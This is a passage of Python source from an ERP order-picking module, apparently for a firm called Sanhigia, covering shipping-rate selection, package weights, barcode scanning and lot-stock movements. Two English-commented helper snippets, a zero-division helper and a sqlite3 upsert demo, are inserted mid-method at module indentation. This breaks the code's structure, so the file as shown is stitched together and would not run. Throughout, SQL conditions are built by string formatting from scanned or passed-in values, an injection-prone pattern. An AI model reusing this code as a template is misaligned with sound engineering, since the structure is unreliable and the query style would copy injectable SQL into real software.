qsatype.FLUtil.sqlSelect(\"provincias\", \"codigo\", \"idprovincia = '{}'\".format(model.idprovincia.idprovincia))\n if codzona == \"07\" and codAgencia == \"CEX\":\n tarifaDefecto = \"82\"\n response = {}\n response['status'] = -1\n\n response['data'] = {\n \"pesobultos\": oParam['pesobultos'],\n \"canbultos\": oParam['canbultos'],\n \"codagencia\": codAgencia,\n \"Tarifa\": tarifaDefecto\n }\n\n response['params'] = [\n {\n \"tipo\": 16,\n \"required\": True,\n \"verbose_name\": \"Nº de Bultos\",\n \"key\": \"canbultos\",\n \"null\": True,\n \"validaciones\": None,\n \"visible\": False\n },\n {\n \"tipo\": 16,\n \"required\": True,\n \"verbose_name\": \"Peso Bultos\",\n \"key\": \"pesobultos\",\n \"null\": True,\n \"visible\": False,\n \"validaciones\": None\n },\n {\n \"tipo\": 5,\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"otros\",\n \"rel\": \"agenciastrans\",\n \"aplic\": \"pedidoscli\",\n \"key\": \"codagencia\",\n \"desc\": \"codagencia\",\n \"verbose_name\": \"Agencia\",\n \"null\": True\n },\n {\n \"tipo\": 5,\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"tarifa\",\n \"label\": \"Tarifa\",\n \"key\": \"Tarifa\",\n \"verbose_name\": \"Tarifa\",\n \"clientoptionslist\": obj\n }\n ]\n return response\n elif \"Tarifa\" not in oParam:\n tarifaDefecto = \"\"\n q = qsatype.FLSqlQuery()\n q.setTablesList(u\"productosagtrans\")\n q.setSelect(u\"codproductoagt, descripcion\")\n q.setFrom(u\"productosagtrans\")\n q.setWhere(u\"codagencia = '{}'\".format(oParam['codagencia']))\n if not q.exec_():\n return False\n obj = {}\n while q.next():\n obj[q.value(\"descripcion\")] = q.value(\"codproductoagt\")\n tarifaDefecto = qsatype.FLUtil.sqlSelect(u\"agenciastrans\", u\"codproductoagtdefecto\", u\"codagencia = '{}'\".format(oParam['codagencia']))\n codzona = qsatype.FLUtil.sqlSelect(\"provincias\", \"codigo\", \"idprovincia = '{}'\".format(model.idprovincia.idprovincia))\n if codzona == \"07\" and oParam['codagencia'] == \"CEX\":\n tarifaDefecto = \"82\"\n response = {}\n response['status'] = -1\n\n response['data'] = {\n \"pesobultos\": oParam['pesobultos'],\n \"canbultos\": 
oParam['canbultos'],\n \"codagencia\": oParam['codagencia'],\n \"Tarifa\": tarifaDefecto\n }\n response['params'] = [\n {\n \"tipo\": 16,\n \"required\": True,\n \"verbose_name\": \"Nº de Bultos\",\n \"key\": \"canbultos\",\n \"null\": True,\n \"validaciones\": None,\n \"visible\": False\n },\n {\n \"tipo\": 16,\n \"required\": True,\n \"verbose_name\": \"Peso Bultos\",\n \"key\": \"pesobultos\",\n \"null\": True,\n \"visible\": False,\n \"validaciones\": None\n },\n {\n \"tipo\": 55,\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"otros\",\n \"rel\": \"agenciastrans\",\n \"aplic\": \"pedidoscli\",\n \"key\": \"codagencia\",\n \"desc\": \"codagencia\",\n \"verbose_name\": \"Agencia\",\n \"null\": True,\n \"visible\": False\n },\n {\n \"tipo\": 5,\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"tarifa\",\n \"label\": \"Tarifa\",\n \"key\": \"Tarifa\",\n \"verbose_name\": \"Tarifa\",\n \"clientoptionslist\": obj\n }\n ]\n return response\n else:\n if oParam['codagencia'] != qsatype.FLUtil.sqlSelect(u\"productosagtrans\", u\"codagencia\", u\"codproductoagt = '{}'\".format(oParam['Tarifa'])):\n codTarifa = qsatype.FLUtil.sqlSelect(u\"agenciastrans\", u\"codproductoagtdefecto\", u\"codagencia = '{}'\".format(oParam['codagencia']))\n codzona = qsatype.FLUtil.sqlSelect(\"provincias\", \"codigo\", \"idprovincia = '{}'\".format(model.idprovincia.idprovincia))\n if codzona == \"07\" and oParam['codagencia'] == \"CEX\":\n codTarifa = \"82\"\n q = qsatype.FLSqlQuery()\n q.setTablesList(u\"productosagtrans\")\n q.setSelect(u\"codproductoagt, descripcion\")\n q.setFrom(u\"productosagtrans\")\n q.setWhere(ustr(u\"codagencia = '{}'\".format(oParam['codagencia'])))\n if not q.exec_():\n return False\n\n obj = {}\n while q.next():\n obj[q.value(\"descripcion\")] = q.value(\"codproductoagt\")\n response = {}\n response['status'] = -1\n\n response['data'] = {\n \"pesobultos\": oParam['pesobultos'],\n \"canbultos\": oParam['canbultos'],\n \"codagencia\": oParam['codagencia'],\n \"Tarifa\": codTarifa\n }\n response['title'] = \"Ha cambiado la agencia, seleccione una tarifa:\"\n response['params'] = [\n {\n \"tipo\": 16,\n \"required\": True,\n \"verbose_name\": \"Nº de Bultos\",\n \"key\": \"canbultos\",\n \"null\": True,\n \"validaciones\": None,\n \"visible\": False\n },\n {\n \"tipo\": 16,\n \"required\": True,\n \"verbose_name\": \"Peso Bultos\",\n \"key\": \"pesobultos\",\n \"null\": True,\n \"visible\": False,\n \"validaciones\": None\n },\n {\n \"tipo\": 56,\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"otros\",\n \"rel\": \"agenciastrans\",\n \"aplic\": \"pedidoscli\",\n \"key\": \"codagencia\",\n \"desc\": \"codagencia\",\n \"verbose_name\": \"Agencia\",\n \"null\": True,\n \"visible\": False\n },\n {\n \"tipo\": 5,\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"tarifa\",\n \"label\": \"Tarifa\",\n \"key\": \"Tarifa\",\n \"verbose_name\": \"Tarifa\",\n \"clientoptionslist\": obj\n }\n ]\n return response\n curPedido = qsatype.FLSqlCursor(u\"pedidoscli\")\n curPedido.select(\"idpedido = {}\".format(model.idpedido))\n if not curPedido.first():\n raise ValueError(\"Error no se encuentra el pedido \")\n return False\n curPedido.setModeAccess(curPedido.Edit)\n curPedido.refreshBuffer()\n curPedido.setValueBuffer(\"pda\", 'Listo PDA')\n codtrabajador = curPedido.valueBuffer(\"codtrabajador\")\n if \"canbultos\" in oParam and \"pesobultos\" in oParam:\n curPedido.setValueBuffer(\"canbultos\", oParam['canbultos'])\n pesobulto = parseFloat(oParam['pesobultos']) / parseFloat(oParam['canbultos'])\n 
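# ---------------------------------------------------------------------------
# pesobultos is stored above as weight per package: total weight divided by
# the number of packages. Earlier in pedidoListoPDA, canbultos defaults to 0
# when missing, so that division deserves a zero guard. A small sketch of the
# safe computation (hypothetical helper, not part of this module):
# ---------------------------------------------------------------------------
def peso_por_bulto(peso_total, n_bultos):
    peso_total = float(peso_total or 0)
    n_bultos = int(n_bultos or 0)
    if n_bultos <= 0:
        # Avoid ZeroDivisionError; treat everything as a single package.
        return peso_total
    return peso_total / n_bultos

# Example: peso_por_bulto(12.5, 5) -> 2.5 ; peso_por_bulto(12.5, 0) -> 12.5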
curPedido.setValueBuffer(\"pesobultos\", pesobulto)\n if \"codagencia\" in oParam:\n curPedido.setValueBuffer(\"codagencia\", oParam['codagencia'])\n if \"Tarifa\" in oParam:\n curPedido.setValueBuffer(\"codproductoagt\", oParam['Tarifa'])\n if not curPedido.commitBuffer():\n return False\n # Actualizar los datod de preparacion para todas las lineas del pedido\n if not qsatype.FLUtil.execSql(u\"UPDATE lineaspedidoscli set sh_preparacion = 'Pendiente' WHERE idpedido = {}\".format(model.idpedido)):\n return False\n\n if not qsatype.FLUtil.execSql(u\"UPDATE lineaspedidoscli set sh_codtrabaprep = '{}' WHERE idpedido = {} AND sh_codtrabaprep IS NULL AND shcantalbaran > 0\".format(codtrabajador, model.idpedido)):\n raise ValueError(\"Error al actualizar el trabajador de las líneas\")\n return False\n return True\n\n def sanhigia_pedidos_actualizarDatosLineas(self, idpedido):\n curLineas = qsatype.FLSqlCursor(u\"lineaspedidoscli\")\n where = \"idpedido = {}\".format(idpedido)\n if not curLineas.select(where):\n return False\n while curLineas.next():\n curLineas.setModeAccess(curLineas.Edit)\n curLineas.refreshBuffer()\n cantidad = curLineas.valueBuffer(\"cantidad\")\n servida = curLineas.valueBuffer(\"totalenalbaran\")\n shcantalbaran = curLineas.valueBuffer(\"shcantalbaran\")\n if shcantalbaran is None:\n shcantalbaran = 0\n if cantidad <= (servida + shcantalbaran):\n curLineas.setValueBuffer(\"sh_estadopreparacion\", \"Todo\")\n curLineas.setValueBuffer(\"sh_preparacion\", \"Lista Envio\")\n elif shcantalbaran > 0:\n curLineas.setValueBuffer(\"sh_estadopreparacion\", \"Parcial\")\n curLineas.setValueBuffer(\"sh_preparacion\", \"Pendiente\")\n # curLineas.setNull(\"codpreparaciondepedido\")\n else:\n curLineas.setValueBuffer(\"sh_estadopreparacion\", \"No\")\n curLineas.setValueBuffer(\"sh_preparacion\", \"Pendiente\")\n # curLineas.setNull(\"codpreparaciondepedido\")\n if not curLineas.commitBuffer():\n return False\n return True\n\n def sanhigia_pedidos_initValidation(self, name, data):\n response = True\n if name == 'formRecord':\n codtrabajador = qsatype.FLUtil.sqlSelect(\"sh_trabajadores\", \"codtrabajador\", \"idusuario = '{}'\".format(qsatype.FLUtil.nameUser()))\n # user = sh_trabajadores.objects.get(nombre__iexact=qsatype.FLUtil.nameUser())\n if not data['DATA']['codtrabajador']:\n response = self.iface.asignarTrabajador(data['DATA']['idpedido'], codtrabajador)\n # Comentado por petición de Javier(Sanhigia) para que los pedidos se pueden gestionar y por usuario que no es el que lo ha creado\n # else:\n # if data['DATA']['codtrabajador'] == codtrabajador:\n # return True\n # else:\n # return False\n return response\n\n def sanhigia_pedidos_field_trabajador(self, model):\n nombre = \"\"\n if(model.codtrabajador):\n nombre = qsatype.FLUtil.sqlSelect(\"sh_trabajadores tr INNER JOIN pedidoscli p ON tr.codtrabajador = p.codtrabajador\", \"tr.nombre\", \"idpedido = {}\".format(model.idpedido))\n # user = sh_trabajadores.objects.get(codtrabajador__iexact=model.codtrabajador)\n # nombre = user.nombre\n return nombre\n\n def sanhigia_pedidos_field_descPreparacion(self, model):\n descPreparacion = \"\"\n q = qsatype.FLSqlQuery()\n q.setTablesList(u\"lineaspedidoscli, pedidoscli, sh_preparaciondepedidos\")\n q.setSelect(u\"l.idlinea, pr.descripcion\")\n q.setFrom(u\"pedidoscli p INNER JOIN lineaspedidoscli l ON p.idpedido = l.idpedido INNER JOIN sh_preparaciondepedidos pr ON l.codpreparaciondepedido = pr.codpreparaciondepedido\")\n # q.setWhere(ustr(u\"p.idpedido = \", model.idpedido, \" GROUP BY 
pr.descripcion, p.idpedido\"))\n q.setWhere(u\"p.idpedido = {} GROUP BY pr.descripcion, l.idlinea\".format(model.idpedido))\n if not q.exec_():\n return descPreparacion\n if q.size() > 100:\n return descPreparacion\n\n descs = {}\n while q.next():\n if q.value(1):\n descs[q.value(1)] = True\n for d in descs:\n descPreparacion += \" \" + d\n return descPreparacion\n\n def sanhigia_pedidos_field_colorRow(self, model):\n estado = model.pda\n trabajador = model.codtrabajador\n if estado == \"Listo PDA\":\n return \"cSuccess\"\n elif estado == \"Albaranado\":\n return \"cDanger\"\n elif trabajador:\n return \"cWarning\"\n else:\n return None\n\n def sanhigia_pedidos_getForeignFields(self, model, template):\n if template == \"mastershpedidoscli\":\n return [\n {'verbose_name': 'rowColor', 'func': 'field_shpedidoscliQuerycolorRow'}\n ]\n return [\n {'verbose_name': 'Trabajador', 'func': 'field_trabajador'},\n {'verbose_name': 'Desc. preparación', 'func': 'field_descPreparacion'},\n {'verbose_name': 'rowColor', 'func': 'field_colorRow'}\n ]\n\n def sanhigia_pedidos_asignarTrabajador(self, idpedido, codtrabajador):\n curPedido = qsatype.FLSqlCursor(u\"pedidoscli\")\n curPedido.select(\"idpedido = {}\".format(idpedido))\n if not curPedido.first():\n raise ValueError(\"Error no se encuentra el pedido \")\n return False\n curPedido.setModeAccess(curPedido.Edit)\n curPedido.refreshBuffer()\n curPedido.setValueBuffer(\"codtrabajador\", codtrabajador)\n if not curPedido.commitBuffer():\n return False\n return True\n\n def sanhigia_pedidos_insertarMovilote(self, idLinea, referencia, cantidad, codAlmacen, codLote):\n resul = {}\n # print(\"idLinea\", idLinea, \"referencia\", referencia, \"cantidad\", cantidad, \"codAlmacen\", codAlmacen, \"codLote\", codLote)\n # lo que tenemos es el codigo de lotes pero lo que se inserta es el campo codlote de lotes, vamos a buscar el primer codlote de la tabla lotes que tenga como codigo el lote que hemos ledio y que tenga stock\n # codLote = qsatype.FLUtil.sqlSelect(u\"lotes\", u\"codlote\", ustr(u\"codigo = '\", codigo, u\"' AND enalmacen > 0 \"))\n if codLote == u\"\" or not codLote:\n resul['status'] = -3\n resul['msg'] = \"No existe ningún lote con stock para este pedido\"\n resul['param'] = idLinea\n return resul\n\n idStock = qsatype.FLUtil.sqlSelect(u\"stocks\", u\"idstock\", u\"referencia = '{}' AND codalmacen = '{}'\".format(referencia, codAlmacen))\n if idStock == u\"\" or not idStock:\n resul['status'] = -3\n resul['msg'] = \"No existe stock para la referencia '{}' en el almacén '{}'\".format(referencia, codAlmacen)\n resul['param'] = idLinea\n return resul\n\n cantidad = cantidad * -1\n hoy = qsatype.Date()\n idmovilote = qsatype.FLUtil.sqlSelect(u\"movilote\", u\"id\", u\"idlineapc = '{}' AND fecha = '{}' AND codlote = '{}' AND idlineaac is null\".format(idLinea, hoy, codLote))\n # print(\"______________\", idmovilote)\n if idmovilote:\n curMovilote = qsatype.FLSqlCursor(u\"movilote\")\n curMovilote.select(\"id = '{}'\".format(idmovilote))\n if not curMovilote.first():\n resul['status'] = -3\n resul['msg'] = \"Error al crear movimiento de lote\"\n resul['param'] = idLinea\n return resul\n curMovilote.setModeAccess(curMovilote.Edit)\n curMovilote.refreshBuffer()\n curMovilote.setValueBuffer(\"cantidad\", curMovilote.valueBuffer(\"cantidad\") + cantidad)\n if not curMovilote.commitBuffer():\n resul['status'] = -3\n resul['msg'] = \"Error al crear movimiento de lote\"\n resul['param'] = idLinea\n return resul\n else:\n # print(\"no por aqui\", cantidad, 
idStock, codLote, idLinea)\n curMovilote = qsatype.FLSqlCursor(u\"movilote\")\n curMovilote.setModeAccess(curMovilote.Insert)\n curMovilote.refreshBuffer()\n curMovilote.setValueBuffer(\"cantidad\", cantidad)\n curMovilote.setValueBuffer(\"idstock\", idStock)\n curMovilote.setValueBuffer(\"tipo\", \"Salida\")\n curMovilote.setValueBuffer(\"codlote\", codLote)\n curMovilote.setValueBuffer(\"docorigen\", \"PC\")\n curMovilote.setValueBuffer(\"fecha\", hoy)\n curMovilote.setValueBuffer(\"idlineapc\", idLinea)\n # print(\"vamos a commit\", curMovilote.valueBuffer(\"codlote\"))\n if not curMovilote.commitBuffer():\n resul['status'] = -3\n resul['msg'] = \"Error al crear movimiento de lote\"\n resul['param'] = idLinea\n return resul\n\n resul['status'] = 0\n resul['msg'] = \"OK\"\n resul['param'] = idLinea\n resul['resul'] = True\n return resul\n\n def sanhigia_pedidos_analizaCodBarras(self, idPedido, barcode, cantidad, codAlmacen, idlineapedido):\n '''\n 1. Comprobar si el barcode existe en alguna línea del pedido.\n 1.1. No existe --> Devuelvo Error.\n 2. Si existe.\n 2.1. El barcode NO es cuadrado\n 2.1.1. El barcode no va por lotes --> Actualizo cantidad de la línea. Devuelvo true.\n 2.1.2. El barcode va por lotes --> Devuelvo que va por lotes para mostrar formulario que elige lotes y debo de hacer otra llamada que inserte el lote y actualice cantidad\n 2.2. El barcode SI es cuadrado --> Tengo lote --> Inserto línea en movilote y devuelvo true.\n\n '''\n # print(\"analizacodbarras\", idlineapedido)\n # print(\"_______________________________________________\")\n referencia = \"\"\n idLinea = idlineapedido\n resul = {}\n # datos = qsatype.FactoriaModulos.get('formRecordarticulosprov').iface.datosLecturaCodBarras(barcode)\n datos = flfactalma_def.iface.datosLecturaCodBarras(barcode)\n qsatype.debug(datos)\n codBarras = datos['codbarras']\n\n # Ver si existe alguna referencia para ese código de barras\n referencia = qsatype.FLUtil.sqlSelect(u\"articulosprov\", u\"referencia\", u\"codbarrasprov = '{}' AND referencia IN (select referencia from lineaspedidoscli where idpedido = {})\".format(codBarras, idPedido))\n if referencia:\n porLotes = qsatype.FLUtil.sqlSelect(u\"articulos\", u\"porlotes\", u\"referencia = '{}'\".format(referencia))\n if not porLotes and \"lote\" in datos:\n datos['lote'] = None\n # Si no existe referencia compruebo si las lineas tienen codbarras\n if referencia == u\"\" or not referencia:\n query = qsatype.FLSqlQuery()\n query.setTablesList(u\"articulosprov,lineaspedidoscli\")\n query.setSelect(u\"DISTINCT(articulosprov.referencia), lineaspedidoscli.descripcion\")\n # query.setSelect(u\"articulosprov.referencia, lineaspedidoscli.idlinea, lineaspedidoscli.descripcion\")\n query.setFrom(u\"articulosprov inner join lineaspedidoscli on articulosprov.referencia = lineaspedidoscli.referencia\")\n # query.setWhere(ustr(u\"articulosprov.codbarrasprov is null AND lineaspedidoscli.idpedido = \", idPedido))\n query.setWhere(u\"lineaspedidoscli.idpedido = {}\".format(idPedido))\n\n if query.exec_():\n if query.size() >= 1:\n resul['status'] = -1\n resul['msg'] = \"¿Asociar código de barras a pedido?\"\n resul['param'] = query\n return resul\n else:\n resul['status'] = -2\n resul['msg'] = \"No existe la referencia en el pedido\"\n resul['param'] = referencia\n return resul\n\n
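# ---------------------------------------------------------------------------
# insertarMovilote and analizaCodBarras both follow an update-or-insert
# pattern: look up an existing movilote row for (line, date, lot), accumulate
# the quantity if it exists, otherwise insert a new movement. A generic,
# self-contained sqlite3 illustration of that pattern follows — the table and
# column names here are a simplified stand-in, not the real movilote schema.
# ---------------------------------------------------------------------------
import sqlite3

def acumula_movimiento(con, idlinea, codlote, cantidad):
    row = con.execute(
        "SELECT id, cantidad FROM movs WHERE idlinea = ? AND codlote = ?",
        (idlinea, codlote)).fetchone()
    if row:
        # Accumulate onto the existing movement row.
        con.execute("UPDATE movs SET cantidad = ? WHERE id = ?",
                    (row[1] + cantidad, row[0]))
    else:
        con.execute("INSERT INTO movs (idlinea, codlote, cantidad) VALUES (?, ?, ?)",
                    (idlinea, codlote, cantidad))
    con.commit()

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE movs (id INTEGER PRIMARY KEY, idlinea INT, codlote TEXT, cantidad REAL)")
acumula_movimiento(con, 1, "L1", -1)   # first scan: inserts a new row
acumula_movimiento(con, 1, "L1", -1)   # second scan: updates cantidad to -2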
# Ver si existe más de una referencia para el código de barras pero filtramos ya por el pedido\n numReg = qsatype.FLUtil.sqlSelect(u\"articulosprov inner join lineaspedidoscli on articulosprov.referencia = lineaspedidoscli.referencia \", u\"count(distinct(articulosprov.referencia))\", u\"articulosprov.codbarrasprov = '{}' AND lineaspedidoscli.idpedido = {} GROUP BY articulosprov.referencia\".format(codBarras, idPedido))\n if not numReg:\n query = qsatype.FLSqlQuery()\n query.setTablesList(u\"articulosprov,lineaspedidoscli\")\n query.setSelect(u\"DISTINCT(articulosprov.referencia), lineaspedidoscli.descripcion\")\n # query.setSelect(u\"articulosprov.referencia, lineaspedidoscli.idlinea, lineaspedidoscli.descripcion\")\n query.setFrom(u\"articulosprov inner join lineaspedidoscli on articulosprov.referencia = lineaspedidoscli.referencia\")\n # query.setWhere(ustr(u\"articulosprov.codbarrasprov is null AND lineaspedidoscli.idpedido = \", idPedido))\n query.setWhere(u\"lineaspedidoscli.idpedido = {}\".format(idPedido))\n\n if query.exec_():\n if query.size() >= 1:\n resul['status'] = -1\n resul['msg'] = \"¿Asociar código de barras a pedido?\"\n resul['param'] = query\n return resul\n else:\n resul['status'] = -2\n resul['msg'] = \"No existe la referencia en el pedido\"\n resul['param'] = referencia\n return resul\n\n if numReg > 1:\n resul['status'] = -3\n resul['msg'] = \"Hay más de una referencia para el código de barras\"\n resul['param'] = codBarras\n return resul\n # si existe solo una referencia para el código de barras que exista en el pedido , cogeremos esa\n if not idlineapedido:\n # print(\"no entra aqui?????\")\n query = qsatype.FLSqlQuery()\n query.setTablesList(u\"lineaspedidoscli\")\n query.setSelect(u\"idlinea, referencia, cantidad, shcantalbaran\")\n query.setFrom(u\"lineaspedidoscli\")\n query.setWhere(u\"referencia = '{}' AND idpedido = {}\".format(referencia, idPedido))\n\n if query.exec_():\n if query.size() > 1:\n while query.next():\n # print(\" linea \", query.value(0), \" cantidad \", int(query.value(2)), \" oparam \", query.value(3), \" son iguales\", int(query.value(2)) == int(query.value(3) or 0))\n if int(query.value(2)) != int(query.value(3) or 0):\n referencia = query.value(1)\n idLinea = query.value(0)\n if not idLinea:\n # print(\"aqui al menos\")\n referencia = query.value(1)\n idLinea = query.value(0)\n if query.size() == 1:\n if query.next():\n referencia = query.value(1)\n idLinea = query.value(0)\n else:\n resul['status'] = -3\n resul['msg'] = \"Error inesperado\"\n return resul\n # 2.Existe\n # 2.1 no es cuadrado\n if datos['lote'] == u\"\" or not datos['lote']:\n porLotes = qsatype.FLUtil.sqlSelect(u\"articulos\", u\"porlotes\", u\"referencia = '{}'\".format(referencia))\n if not porLotes:\n # 2.1.1 actualizo línea\n shcantidad = qsatype.FLUtil.sqlSelect(u\"lineaspedidoscli\", u\"shcantalbaran\", u\"idlinea = {}\".format(idLinea)) or 0\n shcantidad = shcantidad + 1\n if not qsatype.FLUtil.sqlUpdate(u\"lineaspedidoscli\", u\"shcantalbaran\", shcantidad, u\"idlinea = {}\".format(idLinea)):\n resul['status'] = -3\n resul['msg'] = \"Error al actualizar línea del pedido\"\n resul['param'] = idLinea\n return resul\n else:\n # 2.1.2 Va por lotes\n resul['status'] = -3\n resul['msg'] = \"Error inesperado\"\n query = qsatype.FLSqlQuery()\n query.setTablesList(u\"lotes\")\n query.setSelect(u\"*\")\n query.setFrom(u\"lotes\")\n query.setWhere(u\"referencia = '{}' AND enalmacen > 0\".format(referencia))\n\n if query.exec_():\n # TODO\n if query.size() == 1:\n if query.next():\n idStock = 
qsatype.FLUtil.sqlSelect(u\"stocks\", u\"idstock\", u\"referencia = '{}' AND codalmacen = '{}'\".format(referencia, codAlmacen))\n # print(\"aqui tengo que hacer el movimiento\", query.value(0))\n codLote = query.value(\"codlote\")\n hoy = qsatype.Date()\n idmovilote = qsatype.FLUtil.sqlSelect(u\"movilote\", u\"id\", u\"idlineapc = '{}' AND fecha = '{}' AND codlote = '{}' AND idlineaac is null\".format(idLinea, hoy, codLote))\n cantidad = cantidad * -1\n if idmovilote:\n curMovilote = qsatype.FLSqlCursor(u\"movilote\")\n curMovilote.select(\"id = '{}'\".format(idmovilote))\n if not curMovilote.first():\n resul['status'] = -3\n resul['msg'] = \"Error al crear movimiento de lote\"\n resul['param'] = idLinea\n return resul\n curMovilote.setModeAccess(curMovilote.Edit)\n curMovilote.refreshBuffer()\n curMovilote.setValueBuffer(\"cantidad\", curMovilote.valueBuffer(\"cantidad\") + cantidad)\n if not curMovilote.commitBuffer():\n resul['status'] = -3\n resul['msg'] = \"Error al crear movimiento de lote\"\n resul['param'] = idLinea\n return resul\n\n resul['status'] = 0\n resul['msg'] = \"OK\"\n resul['param'] = idLinea\n return resul\n else:\n curMovilote = qsatype.FLSqlCursor(u\"movilote\")\n curMovilote.setModeAccess(curMovilote.Insert)\n curMovilote.refreshBuffer()\n curMovilote.setValueBuffer(\"cantidad\", cantidad)\n curMovilote.setValueBuffer(\"idstock\", idStock)\n curMovilote.setValueBuffer(\"tipo\", \"Salida\")\n curMovilote.setValueBuffer(\"codlote\", codLote)\n curMovilote.setValueBuffer(\"docorigen\", \"PC\")\n curMovilote.setValueBuffer(\"fecha\", hoy)\n curMovilote.setValueBuffer(\"idlineapc\", idLinea)\n\n if not curMovilote.commitBuffer():\n resul['status'] = -1\n resul['msg'] = \"Error al crear movimiento de lote\"\n resul['param'] = idLinea\n return resul\n resul['status'] = 0\n resul['msg'] = \"OK\"\n resul['param'] = idLinea\n return resul\n else:\n return False\n if query.size() > 1:\n resul = {}\n resul['status'] = 2\n resul['msg'] = \"¿Asociar código de barras a pedido?\"\n oParam = {}\n oParam['referencia'] = referencia\n oParam['descripcion'] = qsatype.FLUtil.sqlSelect(u\"articulos\", u\"descripcion\", u\"referencia = '{}'\".format(referencia))\n oParam['idlinea'] = idLinea\n oParam['query'] = query\n resul['param'] = oParam\n return resul\n else:\n resul['status'] = -3\n resul['msg'] = \"No existe stock para la referencia '{}' en el almacén '{}'\".format(referencia, codAlmacen)\n resul['param'] = idLinea\n return resul\n\n return resul\n else:\n # 2.2 El barcode es cuadrado\n codigo = datos['lote']\n # print(\"por aqui ????_______________\")\n # lo que tenemos es el codigo de lotes pero lo que se inserta es el campo codlote de lotes, vamos a buscar el primer codlote de la tabla lotes que tenga como codigo el lote que hemos ledio y que tenga stock\n codLote = qsatype.FLUtil.sqlSelect(u\"lotes\", u\"codlote\", u\"codigo = '{}' and referencia = '{}'\".format(codigo, referencia))\n if not codLote:\n query = qsatype.FLSqlQuery()\n query.setTablesList(u\"lotes\")\n query.setSelect(u\"*\")\n query.setFrom(u\"lotes\")\n query.setWhere(u\"referencia = '{}' AND enalmacen > 0\".format(referencia))\n\n if query.exec_():\n if query.size() >= 1:\n resul = {}\n resul['status'] = 2\n resul['msg'] = \"¿Asociar código de barras a pedido?\"\n oParam = {}\n oParam['referencia'] = referencia\n oParam['descripcion'] = qsatype.FLUtil.sqlSelect(u\"articulos\", u\"descripcion\", u\"referencia = '{}'\".format(referencia))\n oParam['idlinea'] = idLinea\n oParam['query'] = query\n resul['param'] = 
oParam\n return resul\n else:\n resul['status'] = -3\n resul['msg'] = \"No existe stock para la referencia '{}' en el almacén '{}'\".format(referencia, codAlmacen)\n resul['param'] = idLinea\n return resul\n resul['status'] = -3\n resul['msg'] = \"No existe ningún lote con stock para este pedido\"\n resul['param'] = idLinea\n return resul\n codLote = qsatype.FLUtil.sqlSelect(u\"lotes\", u\"codlote\", u\"codigo = '{}' AND enalmacen > 0 and referencia = '{}'\".format(codigo, referencia))\n if codLote == u\"\" or not codLote:\n resul['status'] = -3\n resul['msg'] = \"No hay stock para este lote \"\n resul['param'] = idLinea\n return resul\n\n idStock = qsatype.FLUtil.sqlSelect(u\"stocks\", u\"idstock\", ustr(u\"referencia = '\", referencia, u\"' AND codalmacen = '\", codAlmacen, u\"'\"))\n if idStock == u\"\" or not idStock:\n resul['status'] = -1\n resul['msg'] = \"No existe stock para la referencia '{}' en el almacén '{}'\".format(referencia, codAlmacen)\n resul['param'] = idLinea\n return resul\n\n hoy = qsatype.Date()\n idmovilote = qsatype.FLUtil.sqlSelect(u\"movilote\", u\"id\", ustr(u\"idlineapc = '\", idLinea, u\"' AND fecha = '\", hoy, u\"' AND codlote = '\" + codLote + \"' AND idlineaac is null\"))\n cantidad = cantidad * -1\n # print(idStock, \"idmovilote\", idmovilote, \"codlote\", codLote)\n if idmovilote:\n curMovilote = qsatype.FLSqlCursor(u\"movilote\")\n curMovilote.select(\"id = '\" + str(idmovilote) + \"'\")\n if not curMovilote.first():\n resul['status'] = -3\n resul['msg'] = \"Error al crear movimiento de lote\"\n resul['param'] = idLinea\n return resul\n curMovilote.setModeAccess(curMovilote.Edit)\n curMovilote.refreshBuffer()\n curMovilote.setValueBuffer(\"cantidad\", curMovilote.valueBuffer(\"cantidad\") + cantidad)\n if not curMovilote.commitBuffer():\n resul['status'] = -3\n resul['msg'] = \"Error al crear movimiento de lote\"\n resul['param'] = idLinea\n return resul\n else:\n curMovilote = qsatype.FLSqlCursor(u\"movilote\")\n curMovilote.setModeAccess(curMovilote.Insert)\n curMovilote.refreshBuffer()\n curMovilote.setValueBuffer(\"cantidad\", cantidad)\n curMovilote.setValueBuffer(\"idstock\", idStock)\n curMovilote.setValueBuffer(\"tipo\", \"Salida\")\n curMovilote.setValueBuffer(\"codlote\", codLote)\n curMovilote.setValueBuffer(\"docorigen\", \"PC\")\n curMovilote.setValueBuffer(\"fecha\", hoy)\n curMovilote.setValueBuffer(\"idlineapc\", idLinea)\n\n if not curMovilote.commitBuffer():\n resul['status'] = -1\n resul['msg'] = \"Error al crear movimiento de lote\"\n resul['param'] = idLinea\n return resul\n\n resul['status'] = 0\n resul['msg'] = \"OK\"\n resul['param'] = idLinea\n return resul\n\n def sanhigia_pedidos_analizaCodBarrasLote(self, referencia, barcode, codigo, cantidad, idLinea, codAlmacen):\n # 2.2 El barcode es cuadrado\n resul = {}\n # codigo = lote\n # lo que tenemos es el codigo de lotes pero lo que se inserta es el campo codlote de lotes, vamos a buscar el primer codlote de la tabla lotes que tenga como codigo el lote que hemos ledio y que tenga stock\n # print(\"analiza codbarraslote\", referencia)\n codLote = qsatype.FLUtil.sqlSelect(u\"lotes\", u\"codlote\", ustr(u\"codigo = '\", codigo, u\"' AND enalmacen > 0 AND referencia ='\", referencia, \"'\"))\n if codLote == u\"\" or not codLote:\n resul['status'] = -3\n resul['msg'] = \"No existe ningún lote con stock para este pedido\"\n resul['param'] = idLinea\n return resul\n\n idStock = qsatype.FLUtil.sqlSelect(u\"stocks\", u\"idstock\", ustr(u\"referencia = '\", referencia, u\"' AND codalmacen = 
